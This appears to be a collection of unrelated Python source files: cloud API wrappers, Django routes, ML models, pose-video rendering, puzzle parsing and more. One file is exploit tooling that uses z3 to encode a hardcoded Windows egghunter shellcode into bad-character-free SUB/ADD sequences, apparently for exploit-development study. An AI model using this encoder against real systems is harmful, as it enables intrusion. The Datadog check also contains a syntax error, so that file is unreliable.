"""The collection of channels & messages associated with the team."""
return self.properties.get('channels',
ChannelCollection(self.context, ResourcePath("channels", self.resource_path)))
@property
def primaryChannel(self):
"""The general channel for the team."""
return self.properties.get('primaryChannel',
Channel(self.context, ResourcePath("primaryChannel", self.resource_path)))
@property
def schedule(self):
"""The schedule of shifts for this team."""
return self.properties.get('schedule',
Schedule(self.context, ResourcePath("schedule", self.resource_path)))
@property
def installedApps(self):
"""The apps installed in this team."""
return self.properties.get('installedApps',
TeamsAppInstallationCollection(self.context,
ResourcePath("installedApps", self.resource_path)))
@property
def operations(self):
"""The async operations that ran or are running on this team."""
return self.properties.get('operations',
TeamsAsyncOperationCollection(self.context,
ResourcePath("installedApps", self.resource_path)))
def update(self):
"""Updates a Team."""
qry = UpdateEntityQuery(self)
self.context.add_query(qry)
return self
def archive(self):
"""Archive the specified team. When a team is archived, users can no longer send or like messages on any
channel in the team, edit the team's name, description, or other settings, or in general make most changes to
the team. Membership changes to the team continue to be allowed. """
qry = ServiceOperationQuery(self, "archive")
self.context.add_query(qry)
return self
def unarchive(self):
"""Restore an archived team. This restores users' ability to send messages and edit the team, abiding by
tenant and team settings. """
qry = ServiceOperationQuery(self, "unarchive")
self.context.add_query(qry)
return self
def clone(self):
"""Create a copy of a team. This operation also creates a copy of the corresponding group. """
qry = ServiceOperationQuery(self, "clone")
self.context.add_query(qry)
return self
def set_property(self, name, value, persist_changes=True):
super(Team, self).set_property(name, value, persist_changes)
# fallback: fix resource path
if name == "id" and self._resource_path.segment == "team":
self._resource_path = ResourcePath(value, ResourcePath("teams"))
return self
|
from django.urls import path
from pet_shelter.views import Index, Athome, Pet, About
app_name = 'pet_shelter'
urlpatterns = [
path('', Index.as_view(), name='index'),
path('athome/', Athome.as_view(), name='athome'),
path('detail/<int:pk>/', Pet.as_view(), name='pet-detail'),
path('about/', About.as_view(), name='about'),
]
|
import os
import config
from scipy.interpolate import interp2d
import tensorflow as tf
import numpy as np
from tensorflow.python.keras import backend as K
from tensorflow.python.keras import metrics
from tensorflow.python.keras.models import Model, Sequential
from tensorflow.python.keras.layers import Activation, Concatenate, Dropout, AlphaDropout, Reshape, Layer, Lambda, BatchNormalization, Input, Flatten, Conv2D, Conv2DTranspose, LocallyConnected2D, Dense, MaxPooling2D, AveragePooling2D, UpSampling2D, LeakyReLU
from tensorflow.python.keras.regularizers import l2
from tensorflow.python.keras.optimizers import Adam, Nadam
from tensorflow.python.keras.losses import binary_crossentropy
from lib.models.util.make_parallel import make_parallel
class Framer(object):
def __init__(self, input_shape=(778, 576, 1), num_categories=5, parallel_mode = False, verbose=False):
"""
https://keras.io/getting-started/functional-api-guide/#multi-input-and-multi-output-models
https://keras.io/getting-started/functional-api-guide/#shared-layers
https://blog.keras.io/building-autoencoders-in-keras.html
https://github.com/fchollet/keras/blob/master/examples/variational_autoencoder_deconv.py
"""
self.num_categories = num_categories
filters = 128
img_rows, img_cols, img_chns = input_shape
input_img = Input(shape=input_shape, name="main_input")
if verbose:
print("Network input shape is", input_img.get_shape())
x = Conv2D(filters, (3, 3), padding='same', activity_regularizer=l2(10e-8))(input_img)
x = BatchNormalization()(x)
x = LeakyReLU(alpha=0.05)(x)
x = Conv2D(filters, (3, 3), padding='same', activity_regularizer=l2(10e-8))(x)
x = BatchNormalization()(x)
x = LeakyReLU(alpha=0.05)(x)
x = Conv2D(filters, (3, 3), padding='same', activity_regularizer=l2(10e-8))(x)
x = BatchNormalization()(x)
x = LeakyReLU(alpha=0.05)(x)
self.framer = Model(input_img, x)
optimizer = Nadam(lr=0.0002, beta_1=0.9, beta_2=0.999, epsilon=1e-08, schedule_decay=0.004, clipnorm=0.618)
self.framer.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['acc'])
def save(self, path):
loc = os.path.join(self.path(), path)
print("Saving weights to", loc)
self.classycoder.save_weights(loc)
return self
def load(self, path = "Classifier.h5"):
loc = os.path.join(self.path(), path)
print("Loading weights", loc)
self.classycoder.load_weights(loc)
return self
def path(self):
return os.path.dirname(os.path.realpath(__file__))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import torch
import math
import cv2
import numpy as np
import time
import gizeh as gz
import json
from more_itertools.recipes import grouper, pairwise
import moviepy.editor as mpy
import pandas as pd
DEFAULT_FONT = cv2.FONT_HERSHEY_SIMPLEX
DEFAULT_VIDEO_SAVE_OPT = {
'savepath': 'examples/res/1.mp4',
'fourcc': cv2.VideoWriter_fourcc(*'mp4v'),
'fps': 25,
'frameSize': (640, 480)
}
l_pair_17 = [
(0, 1), (0, 2), (1, 3), (2, 4), # Head
(5, 6), (5, 7), (7, 9), (6, 8), (8, 10),
(17, 11), (17, 12), # Body
(11, 13), (12, 14), (13, 15), (14, 16),(17,0)
]
colors17 = np.array([
[255, 0, 0], [255, 85, 0], [255, 170, 0], [255, 255, 0], [170, 255, 0],
[85, 255, 0], [0, 255, 0], [0, 255, 85],
[0, 255, 170], [255,200,100],
[0, 170, 255], [255,130,100], [0, 0, 255], [255,150,80], [0, 50, 255],
[255,0,0]])/255
p_color_17 = np.array([(0, 255, 255), (0, 191, 255), (0, 255, 102), (0, 77, 255), (0, 255, 0), # Nose, LEye, REye, LEar, REar
(77, 255, 255), (77, 255, 204), (77, 204, 255), (191, 255, 77), (77, 191, 255), (191, 255, 77), # LShoulder, RShoulder, LElbow, RElbow, LWrist, RWrist
(204, 77, 255), (77, 255, 204), (191, 77, 255), (77, 255, 191), (127, 77, 255), (77, 255, 127), (0, 255, 255)])/255 # LHip, RHip, LKnee, Rknee, LAnkle, RAnkle, Neck
#p_color_17 = np.array([(255, 0, 85), (255, 0, 0), (255, 85, 0), (255, 170, 0), (255, 255, 0), (170, 255, 0), (85, 255, 0), (0, 255, 0), (0, 255, 85), (0, 255, 170), (0, 255, 255), (0, 170, 255), (0, 85, 255), (0, 0, 255), (255, 0, 170), (170, 0, 255), (255, 0, 255), (85, 0, 255)])/255
line_color_17 = np.array([(0, 215, 255), (0, 255, 204), (0, 134, 255), (0, 255, 50),
(77, 255, 222), (191, 255, 77), (77, 255, 77), (77, 196, 255), (77, 135, 255),
(255, 80, 120), (77, 222, 255),
(255, 0,80), (0, 80, 255), (255, 0,0), (0, 0, 255),(77, 255, 222)])/255
l_pair_26 = [
(0, 1), (0, 2), (1, 3), (2, 4), # Head
(5, 18), (6, 18), (5, 7), (7, 9), (6, 8), (8, 10),# Body
(17, 18), (18, 19), (19, 11), (19, 12),
(11, 13), (12, 14), (13, 15), (14, 16),
(20, 15), (21, 16), (23, 16), (22, 15), (15, 24), (16, 25),# Foot
]
p_color_26 = np.array([(0, 255, 255), (0, 191, 255), (0, 255, 102), (0, 77, 255), (0, 255, 0), # Nose, LEye, REye, LEar, REar
(77, 255, 255), (77, 255, 204), (77, 204, 255), (191, 255, 77), (77, 191, 255), (191, 255, 77), # LShoulder, RShoulder, LElbow, RElbow, LWrist, RWrist
(204, 77, 255), (77, 255, 204), (191, 77, 255), (77, 255, 191), (127, 77, 255), (77, 255, 127), # LHip, RHip, LKnee, Rknee, LAnkle, RAnkle, Neck
(77, 255, 255), (0, 255, 255), (77, 204, 255), # head, neck, shoulder
(0, 255, 255), (0, 191, 255), (0, 255, 102), (0, 77, 255), (0, 255, 0), (77, 255, 255)])/255 # foot)
line_color_26 = np.array([(0, 215, 255), (0, 255, 204), (0, 134, 255), (0, 255, 50),
(0, 255, 102), (77, 255, 222), (77, 196, 255), (77, 135, 255), (191, 255, 77), (77, 255, 77),
(77, 191, 255), (204, 77, 255), (77, 222, 255), (255, 156, 127),
(0, 127, 255), (255, 127, 77), (0, 77, 255), (255, 77, 36),
(0, 77, 255), (0, 77, 255), (0, 77, 255), (0, 77, 255), (255, 156, 127), (255, 156, 127)])/255
l_pair_openpose = [
[1, 2], [1, 5], [2, 3], [3, 4], [5, 6], [6, 7], [1, 8], [8, 9], [9, 10],
[1, 11], [11, 12], [12, 13], [1, 0], [0, 14], [14, 16], [0, 15], [15, 17],
]
l_pair_openpose25 = [
[1, 2], [1, 5], [2, 3], [3, 4], [5, 6], [6, 7], [1, 8],
[8, 9], [9, 10], [10,11], [11,24], [11,22], [22,23],
[8,12], [12, 13], [13,14], [14,21], [14,19], [19,20],
[1, 0],
[0, 16], [18, 16],
[0, 15], [15, 17],
]
colors_openpose25 = np.array([
[255, 0, 0], [255, 85, 0], [255, 170, 0], [255, 255, 0], [170, 255, 0],
[85, 255, 0], [255,0,0],
[0, 255, 0], [0, 255, 85], [0, 255, 85], [0, 255, 85], [0, 255, 85], [0, 255, 85],
[0, 255, 170], [0, 255, 255],[0, 170, 255],[0, 170, 255],[0, 170, 255],[0, 170, 255],
[0, 85, 255],
# [0, 0, 255], [85, 0, 255],
# [170, 0, 255],
[255, 0, 255], [255, 0, 170],
[255, 0, 85], [255, 0, 0]])/255
#for plot usage
colors_openpose = np.array([
[255, 0, 0], [255, 85, 0], [255, 170, 0], [255, 255, 0], [170, 255, 0],
[85, 255, 0], [0, 255, 0], [0, 255, 85], [0, 255, 170], [0, 255, 255],
[0, 170, 255], [0, 85, 255], [0, 0, 255], [85, 0, 255], [170, 0, 255],
[255, 0, 255], [255, 0, 170], [255, 0, 85], [255, 0, 0]])/255
def build_graph(lines):
graph = {}
for line in lines:
for n1, n2 in pairwise(line):
if n1 > n2:
n1, n2 = n2, n1
graph.setdefault(n1, set()).add(n2)
return graph
#BODY_25_GRAPH = build_graph(BODY_25_LINES)
def max_dim(doc, dim):
return max((
val
for person in doc["people"]
for numarr in person.values()
for val in numarr[dim::3]
))
#to visualize the final ready dataset and the generated dance
def make_video_openpose(data, save_video=True, output_filename="../test.mp4",fps=10):
width = 640
height = 360
joints = 18
print("make! fps:",fps, len(data))
arr = True if isinstance(data, np.ndarray) else False
result = []
for frame in data:
# print(cur_idx, frame['image_id'])
surface = gz.Surface(width=width, height=height, bg_color=(1,1,1))
if arr:
pose = frame.tolist()
else:
n_group = int(len(frame['keypoints']) / joints)
pose = list(grouper(frame["keypoints"], n_group))
line_cnt = 0
l_pair = l_pair_openpose
line_color = colors_openpose
for limb in l_pair:
x1, y1 = pose[limb[0]]
x2, y2 = pose[limb[1]]
line = gz.polyline(points=[(x1,y1), (x2,y2)], stroke_width = 6, stroke=line_color[line_cnt])
# print('line', line_cnt)
line_cnt += 1
line.draw(surface)
for idx in range(len(pose)):
# print(idx)
x1, y1 = pose[idx]
joint = gz.circle(4, xy=[x1,y1], fill=(0,0,0))
joint.draw(surface)
result.append(surface.get_npimage())
if save_video:
clip = mpy.ImageSequenceClip(result, fps=fps)
clip.write_videofile(output_filename, fps=fps, codec='mpeg4')
def visualize_frame(frame, joints=17, label=0):
surface = gz.Surface(width=640, height=360, bg_color=(1,1,1))
if joints == 25:
frame = frame['people'][0]
n_group = int(len(frame['pose_keypoints_2d']) / joints)
pose = list(grouper(frame["pose_keypoints_2d"], n_group))
else:
n_group = int(len(frame['keypoints']) / joints)
pose = list(grouper(frame["keypoints"], n_group))
# print(pose)
if joints==17:
l_pair = l_pair_17
line_color = colors17
elif joints==25:
l_pair = l_pair_openpose25
line_color = colors_openpose25
elif joints == 26:
l_pair = l_pair_26
line_color = line_color_26
line_cnt = 0
for limb in l_pair:
# print(limb)
if limb[0] == joints and (joints == 17 or joints == 26):
x1, y1, _ = (np.array(pose[5]) + np.array(pose[6])) / 2 #neck
else:
x1, y1, _ = pose[limb[0]]
x2, y2, _ = pose[limb[1]]
line = gz.polyline(points=[(x1,y1), (x2,y2)], stroke_width = 6, stroke=line_color[line_cnt])
# print('line', line_cnt)
line_cnt += 1
line.draw(surface)
for idx in range(len(pose)):
# print(idx)
x1, y1,_ = pose[idx]
joint = gz.circle(4, xy=[x1,y1], fill=(0,0,0))
joint.draw(surface)
show_img(surface.get_npimage(), label)
def make_frame_clean(data, save_video=True, joints=17,output_filename="../test.mp4",fps=30):
width = 640
height = 360
print("make! fps:",fps, len(data))
arr = True if isinstance(data, np.ndarray) else False
result = []
# BODY_17_GRAPH = build_graph(BODY_17_LINES)
cur_idx = -1
for frame in data:
# print(cur_idx, frame['image_id'])
surface = gz.Surface(width=width, height=height, bg_color=(1,1,1))
cur_idx += 1
if arr:
pose = frame.tolist()
else:
n_group = int(len(frame['keypoints']) / joints)
pose = list(grouper(frame["keypoints"], n_group))
line_cnt = 0
if joints==17 or joints == 18:
l_pair = l_pair_17
line_color = line_color_17
p_color = p_color_17
elif joints == 26:
l_pair = l_pair_26
line_color = line_color_26
p_color = p_color_26
for limb in l_pair:
if limb[0] == joints and joints == 17:
x1, y1 = (np.array(pose[5]) + np.array(pose[6])) / 2 #neck
else:
x1, y1 = pose[limb[0]]
x2, y2 = pose[limb[1]]
line = gz.polyline(points=[(x1,y1), (x2,y2)], stroke_width = 6, stroke=line_color[line_cnt])
# print('line', line_cnt)
line_cnt += 1
line.draw(surface)
for idx in range(len(pose)):
# print(idx)
x1, y1 = pose[idx]
joint = gz.circle(4, xy=[x1,y1], fill=(0,0,0))
joint.draw(surface)
result.append(surface.get_npimage())
if save_video:
clip = mpy.ImageSequenceClip(result, fps=fps)
clip.write_videofile(output_filename, fps=fps, codec='mpeg4')
# =============================================================================
# TODO: multi-person
# =============================================================================
def make_frame(data, save_video=True, joints=17,output_filename="../test.mp4"):
width = 720
height = 540
result = []
# BODY_17_GRAPH = build_graph(BODY_17_LINES)
cur_idx = -1
for frame in data:
frame_idx = int(frame['image_id'].split('.')[0])
# print(cur_idx, frame['image_id'])
if frame_idx == cur_idx: #same frame
# print('cont', cur_idx)
continue
surface = gz.Surface(width=width, height=height, bg_color=(1,1,1))
if (frame_idx - cur_idx) > 1: #missing frame
# print('missing frame')
time.sleep(0.5)
#missing += (frame_idx - cur_idx -1)
cur_idx += (frame_idx - cur_idx)
result.append(surface.get_npimage())
continue
cur_idx += 1
n_group = int(len(frame['keypoints']) / joints)
pose = list(grouper(frame["keypoints"], n_group))
line_cnt = 0
if joints==17 or joints == 18:
l_pair = l_pair_17
line_color = line_color_17
p_color = p_color_17
elif joints == 26:
l_pair = l_pair_26
line_color = line_color_26
p_color = p_color_26
for limb in l_pair:
if limb[0] == joints and joints == 17:
x1, y1, c1 = (np.array(pose[5]) + np.array(pose[6])) / 2 #neck
else:
x1, y1, c1 = pose[limb[0]]
x2, y2, c2 = pose[limb[1]]
line = gz.polyline(points=[(x1,y1), (x2,y2)], stroke_width = 3, stroke=line_color[line_cnt])
# print('line', line_cnt)
line_cnt += 1
line.draw(surface)
for idx in range(len(pose)):
# print(idx)
x1, y1, c1 = pose[idx]
joint = gz.circle(3, xy=[x1,y1], fill=(0,0,0))
joint.draw(surface)
#
# for g_idx in BODY_17_GRAPH.get(idx, set()):
#
# if g_idx == 17:
# x2, y2, c2 = (np.array(pose[5]) + np.array(pose[6])) / 2 #neck
# joint = gz.circle(3, xy=[x2,y2], fill=p_color[g_idx])
# joint.draw(surface)
# else:
# x2, y2, c2 = pose[g_idx]
# c = min(c1, c2)
#
## if c == 0:
## continue
# line = gz.polyline(
# points=[(x1, y1), (x2, y2)], stroke_width=5 * c,
# stroke=line_color[line_cnt]
# )
# print('color ',line_cnt, line_color[line_cnt])
# line_cnt += 1
# line.draw(surface)
result.append(surface.get_npimage())
if save_video:
clip = mpy.ImageSequenceClip(result, fps=30)
clip.write_videofile(output_filename, fps=30, codec='mpeg4')
#clip.ipython_display(fps=30)
# return result
def getTime(time1=0):
if not time1:
return time.time()
else:
interval = time.time() - time1
return time.time(), interval
#filename = 'output_fast/alphapose-results-fast-29_Trim.json'
#filename = 'output_halpe26/alphapose-results-halpe26-29_Trim.json'
#with open(filename,'r') as of:
# data = json.load(of)
from PIL import Image
#r = make_frame(data[:1200],joints=17)
#r = make_frame(data,joints=26, output_filename="../test29_2.mp4")
def show_img(arr,idx=0):
img = Image.fromarray(arr)
# img.show()
img.save(f'testframes/clean/{idx}.jpg')
|
import requests
# the following try/except block will make the custom check compatible with any Agent version
try:
# first, try to import the base class from old versions of the Agent...
from checks import AgentCheck
except ImportError:
# ...if the above failed, the check is running in Agent version 6 or later
from datadog_checks.checks import AgentCheck
# content of the special variable __version__ will be shown in the Agent status page
__version__ = "1.0.0"
class WeatherTempCheck(AgentCheck):
def check(self, instance):
url = 'https://api.openweathermap.org/data/2.5/weather?q=London,uk&units=metric&appid='YOUR_API_KEY'
res = requests.get(url)
data = res.json()
temp = data['main']['temp']
humidity = data['main']['humidity']
clouds = data['clouds']['all']
self.gauge('weather.temp', temp, tags=['location:london'])
self.gauge('weather.humidity', humidity, tags=['location:london'])
self.gauge('weather.clouds',clouds, tags=['location:london'])
|
def permutations(xs):
if xs:
return [[x] + ys
for x in xs
for ys in permutations([i for i in xs if i != x])]
else:
return [[]]
print(permutations([1,2,3]))
|
import cv2
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from SUMNet_bn import SUMNet
import SimpleITK as sitk
import matplotlib.pyplot as plt
import pandas as pd
from glob import glob
from torchvision import transforms
def load_itk_image(filename):
itkimage = sitk.ReadImage(filename)
numpyImage = sitk.GetArrayFromImage(itkimage)
numpyOrigin = np.array(list(reversed(itkimage.GetOrigin())))
numpySpacing = np.array(list(reversed(itkimage.GetSpacing())))
return numpyImage, numpyOrigin, numpySpacing
def get_filename(case):
global file_list
for f in file_list:
if case in f:
return(f)
luna_subset_path = '/home/siplab/rachana/rak/dataset/subset3/'
result_path = '/home/siplab/rachana/rak/img_results/'
img_file = '/home/siplab/rachana/rak/dataset/subset3/1.3.6.1.4.1.14519.5.2.1.6279.6001.244681063194071446501270815660.mhd'
itk_img = sitk.ReadImage(img_file)
img_tensor = torch.from_numpy(sitk.GetArrayFromImage(itk_img)).unsqueeze(1).float()
seg_model_loadPath = '/home/siplab/rachana/rak/Results/SUMNet/Adam_1e-4_ep100/'
netS = SUMNet(in_ch=1,out_ch=2)
netS.load_state_dict(torch.load(seg_model_loadPath+'sumnet_best.pt'))
apply_norm = transforms.Normalize([-460.466],[444.421])
N = int(img_tensor.shape[0]*0.5)
for sliceNum in range(N-5,N+5):
img_slice = img_tensor[sliceNum]
mid_mean = img_slice[:,100:400,100:400].mean()
img_slice[img_slice==img_slice.min()] = mid_mean
img_slice[img_slice==img_slice.max()] = mid_mean
img_slice_norm = apply_norm(img_slice).unsqueeze(0)
out = F.softmax(netS(img_slice_norm),dim=1)
out_np = np.asarray(out[0,1].squeeze(0).detach().cpu().numpy()*255,dtype=np.uint8)
ret, thresh = cv2.threshold(out_np,0,1,cv2.THRESH_BINARY+cv2.THRESH_OTSU)
connectivity = 4
output = cv2.connectedComponentsWithStats(thresh, connectivity, cv2.CV_32S)
stats = output[2]
temp = stats[1:, cv2.CC_STAT_AREA]
if len(temp)>0:
largest_label = 1 + np.argmax(temp)
areas = stats[1:, cv2.CC_STAT_AREA]
max_area = np.max(areas)
if max_area>150:
print('Slice:',sliceNum+1)
out_mask = np.zeros((512,512))
idx = np.where(output[1]==largest_label)
out_mask[idx] = 1
plt.figure(figsize=[15,5])
plt.subplot(131)
plt.imshow(img_slice.squeeze(0).squeeze(0).numpy(),cmap='gray')
plt.title('Original image')
plt.subplot(132)
plt.imshow(out[0,1].squeeze(0).detach().numpy(),cmap='gray')
plt.title('Segmented regions')
plt.subplot(133)
plt.imshow(out_mask,cmap='gray')
plt.title('Detected largest nodule')
plt.savefig(result_path+'slice_'+str(sliceNum+1)+'.png')
plt.close()
|
#!/usr/bin/env python3
import os
import csv
import pygraphviz
def main():
nodes = {}
graphfile = open("graph.csv", "r")
graph_csv = csv.reader(graphfile)
for row in graph_csv:
if ("Node" not in row[0]):
i = 0
while (i < len(row)):
if (i == 0):
nodes[row[0]] = Node(row[0])
i = i+1
else:
nodes[row[0]].add_remote(remotenode(row[i], row[i+1], row[i+2]))
i = i + 3
G=pygraphviz.AGraph(strict=False,directed=True)
for node in nodes:
for rnode in nodes[node].remote:
if (G.has_edge(rnode.hostname,nodes[node].hostname)):
G.get_edge(rnode.hostname,nodes[node].hostname).attr['dir']="both"
else:
label = '%s:%s' % (rnode.localinterface,rnode.remoteinterface)
G.add_edge(nodes[node].hostname,rnode.hostname, label = label)
G.layout(prog='dot')
G.draw('topology.png',prog='dot')
class Node(object):
"""docstring for Node."""
def __init__(self, hostname):
super(Node, self).__init__()
self.hostname = hostname
self.remote = []
def add_remote(self, remote_node):
self.remote.append(remote_node)
class remotenode(object):
"""docstring for remotenode."""
def __init__(self, hostname, localinterface, remoteinterface):
super(remotenode, self).__init__()
self.hostname = hostname
self.localinterface = localinterface
self.remoteinterface = remoteinterface
main()
|
from flask_restful import Resource
from json import load as json_load
import os
from data_operations.database.helpers import DB
class Endpoint(Resource):
def __init__(self):
if 'carbon_black' not in os.getcwd():
with open('./data_operations/config.json') as f:
self.config = json_load(f)
else:
with open('../data_operations/config.json') as f:
self.config = json_load(f)
return
def query_db(self, db_name: str, query: str):
results = []
db = DB(db_name, False)
try:
results = db.select(query)
return results
except Exception as err:
print(err)
return []
# returns a list of tuples from sql execucation
def query(self, api_endpoint: str, query: str) -> list:
db = None
results = []
for data_item in self.config['nostradamus']:
if data_item['api_endpoint'] == api_endpoint:
db = DB(data_item['database_name'])
if db == None:
return
results = db.select(query)
del db
return results
|
#!/usr/bin/env python3
from z3 import *
import struct
# idea to use z3 taken from https://marcosvalle.github.io/re/exploit/2018/10/05/sub-encoding.html
# poc code expanded to fully encode all shellcode
def solve_zero_eax(good_chars):
x1 = Int('x1')
x2 = Int('x2')
x3 = Int('x3')
x4 = Int('x4')
y1 = Int('y1')
y2 = Int('y2')
y3 = Int('y3')
y4 = Int('y4')
X = BitVec('X', 32)
Y = BitVec('Y', 32)
s = Solver()
s.add(X & Y == 0)
s.add(0x1000000*x1 + 0x10000*x2 + 0x100*x3 + x4 == BV2Int(X))
s.add(0x1000000*y1 + 0x10000*y2 + 0x100*y3 + y4 == BV2Int(Y))
constrained_ints = [x1,x2,x3,x4,y1,y2,y3,y4]
for ci in constrained_ints:
s.add(Or([ci == ord(i) for i in good_chars]))
s.check()
s.model()
return [s.model()[X].as_long(), s.model()[Y].as_long()]
def solve_sub_encode(b, good_chars):
x1 = Int('x1')
x2 = Int('x2')
x3 = Int('x3')
x4 = Int('x4')
y1 = Int('y1')
y2 = Int('y2')
y3 = Int('y3')
y4 = Int('y4')
z1 = Int('z1')
z2 = Int('z2')
z3 = Int('z3')
z4 = Int('z4')
X = Int('X')
Y = Int('Y')
Z = Int('Z')
s = Solver()
s.add(Or(X+Y+Z==b, X+Y+Z==0x100000000 + b))
s.add(0x1000000*x1 + 0x10000*x2 + 0x100*x3 + x4 == X)
s.add(0x1000000*y1 + 0x10000*y2 + 0x100*y3 + y4 == Y)
s.add(0x1000000*z1 + 0x10000*z2 + 0x100*z3 + z4 == Z)
constrained_ints = [x1,x2,x3,x4,y1,y2,y3,y4,z1,z2,z3,z4]
for ci in constrained_ints:
s.add(Or([ci == ord(i) for i in good_chars]))
s.check()
s.model()
return [s.model()[X].as_long(), s.model()[Y].as_long(), s.model()[Z].as_long()]
def solve_add_encode(b, good_chars):
x1 = Int('x1')
x2 = Int('x2')
x3 = Int('x3')
x4 = Int('x4')
y1 = Int('y1')
y2 = Int('y2')
y3 = Int('y3')
y4 = Int('y4')
z1 = Int('z1')
z2 = Int('z2')
z3 = Int('z3')
z4 = Int('z4')
X = Int('X')
Y = Int('Y')
Z = Int('Z')
s = Solver()
s.add(Or(X+Y+Z==b, X+Y+Z==0x100000000 + b))
s.add(0x1000000*x1 + 0x10000*x2 + 0x100*x3 + x4 == X)
s.add(0x1000000*y1 + 0x10000*y2 + 0x100*y3 + y4 == Y)
s.add(0x1000000*z1 + 0x10000*z2 + 0x100*z3 + z4 == Z)
constrained_ints = [x1,x2,x3,x4,y1,y2,y3,y4,z1,z2,z3,z4]
for ci in constrained_ints:
s.add(Or([ci == ord(i) for i in good_chars]))
s.check()
s.model()
return [s.model()[X].as_long(), s.model()[Y].as_long(), s.model()[Z].as_long()]
def do_sub_encoding(egghunter, good_chars):
print("# BEGIN AUTOGENERATED ENCODED EGGHUNTER")
res = solve_zero_eax(good_chars)
# 25 is and eax, lv
print("zero_eax =",b"\x25","+",struct.pack("<I", res[0]),"+",b"\x25","+",struct.pack("<I", res[1]))
print("encoded_egg_hunter = b''")
for instruction_block in egghunter:
print(f"# SUB encoding instructions: {instruction_block.hex()}")
i = struct.unpack("<I", instruction_block)[0]
neg = 0xFFFFFFFF - i + 1
print("# 0xFFFFFFFF - 0x{:x} + 1 = 0x{:x}".format(i, neg)) #carry
res = solve_sub_encode(neg, good_chars)
print("encoded_egg_hunter += zero_eax")
for b in res:
# 2D is sub eax, lv
print("#", hex(b))
print("encoded_egg_hunter +=", b"\x2D", "+", struct.pack("<I", b))
# push eax
print("encoded_egg_hunter +=", b'\x50')
print("# END AUTOGENERATED ENCODED EGGHUNTER")
def do_add_encoding(egghunter, good_chars):
print("# BEGIN AUTOGENERATED ENCODED EGGHUNTER")
res = solve_zero_eax(good_chars)
# 25 is and eax, lv
print("zero_eax =",b"\x25","+",struct.pack("<I", res[0]),"+",b"\x25","+",struct.pack("<I", res[1]))
print("encoded_egg_hunter = b''")
for instruction_block in egghunter:
print(f"# ADD encoding instructions: {instruction_block.hex()}")
i = struct.unpack("<I", instruction_block)[0]
res = solve_add_encode(i, good_chars)
check = 0
print("encoded_egg_hunter += zero_eax")
for b in res:
print("#", hex(b))
# 05 is add eax, lv
print("encoded_egg_hunter +=", b"\x05", "+", struct.pack("<I", b))
# push eax
print("encoded_egg_hunter +=", b'\x50')
print("# END AUTOGENERATED ENCODED EGGHUNTER")
def prep_shellcode(shellcode):
l = []
for i in range(0, len(shellcode), 4):
l.append(shellcode[i:i+4])
l.reverse()
return l
# egghunter shellcode, can change this to whatever shellcode you want
shellcode = b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
if len(shellcode) % 4 != 0:
print(f"Shellcode not divisible by 4, was {len(shellcode)} bytes, pad with 'nops'")
exit()
egghunter = prep_shellcode(shellcode)
# good chars list, might have to change this
good_chars = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13"
good_chars += "\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24"
good_chars += "\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x30\x31\x32\x33\x34\x35\x36"
good_chars += "\x37\x38\x39\x3b\x3c\x3d\x3e\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a"
good_chars += "\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b"
good_chars += "\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c"
good_chars += "\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d"
good_chars += "\x7e\x7f"
do_add_encoding(egghunter, good_chars)
do_sub_encoding(egghunter, good_chars)
|
class Solution:
def wordBreak(self, s: str, wordDict: List[str]) -> bool:
@cache
def go(i):
if i == len(s):
return True
res = False
for j in range(i+1, len(s)+1):
if s[i:j] in wordDict:
res = res or go(j)
return res
return go(0)
|
from pyparsing import oneOf, OneOrMore, Group, Word, nums, Suppress, pythonStyleComment, ParseException
import time
import os.path
class Checkpoint(object):
# Used to stop undo rollback
pass
class AnswerError(Exception):
def __init__(self, cells):
self.cells = cells
class CandidateError(Exception):
def __init__(self, cells):
self.cells = cells
class Update(object):
def __init__(self, coords, ans, cand):
self.coords, self.answer, self.candidates = coords, ans, cand
class Puzzle(object):
def __init__(self, fin, parent):
# fin will be passed to pyparsing. It must be an open file object
def coords(idx):
# utility function to convert list index to coordinates
return (1+idx // dim, 1 + idx % dim)
self.solution = {}
self.history = []
self.answer = {}
self.candidates = {}
self.parent = parent
# use pyparsing to parse input file
try:
# first assume that the file is in .ken format
p = self.parseKen(fin)
type = 'ken'
except ParseException:
# attempt parsing in .kip format
fin.seek(0,0) # rewind
p = self.parseKip(fin)
type = 'kip'
except ParseException:
raise
self.infile = fin.name
self.isDirty = False
self.dim = dim = int(p.dim)
for i in range(1, dim+1):
for j in range(1, dim+1):
self.answer[(i,j)] = 0
self.candidates[(i,j)] = []
# Cells are numbered as (row, col), where 1 <= row, col <= dim
for c in p.cages:
cage = Cage( c.oper, int(c.value), c.cells, int(c.color) )
self.cages.append(cage)
for cell in cage:
self.cageID[cell] = cage
if len(c.cells) == 1:
cell = c.cells[0]
x = int(cell[0])
y = int(cell[1])
self.oneCellCages.append( (x, y) )
self.answer[(x, y)] = int(c.value)
for idx, val in enumerate(p.soln):
self.solution[coords(idx)] = int(val)
if type == 'ken':
return
# input file is in .kip format
for idx, val in enumerate(p.answer):
self.answer[coords(idx)] = int(val)
for idx, val in enumerate(p.candidates):
self.candidates[coords(idx)] = [] if val == '0' else [int(c) for c in val]
for h in p.history:
if h == 'checkpoint':
self.history.append(Checkpoint())
else:
x, y = int(h.coords[0]), int(h.coords[1])
ans = int(h.answer)
cand = [int(c) for c in h.candidates]
if cand == [0]:
cand = []
self.history.append(Update((x,y), ans, cand ))
self.parent.control.setTime(int(p.time))
def parseKen(self, fin):
# parser for .ken files
operator = oneOf("ADD SUB MUL DIV NONE")
integer = Word(nums)
lbrack = Suppress('[')
rbrack = Suppress(']')
cage = Group( operator("oper") + integer("value") +\
lbrack + OneOrMore(integer)("cells") + rbrack +\
integer("color") )
cages = OneOrMore(cage)("cages")
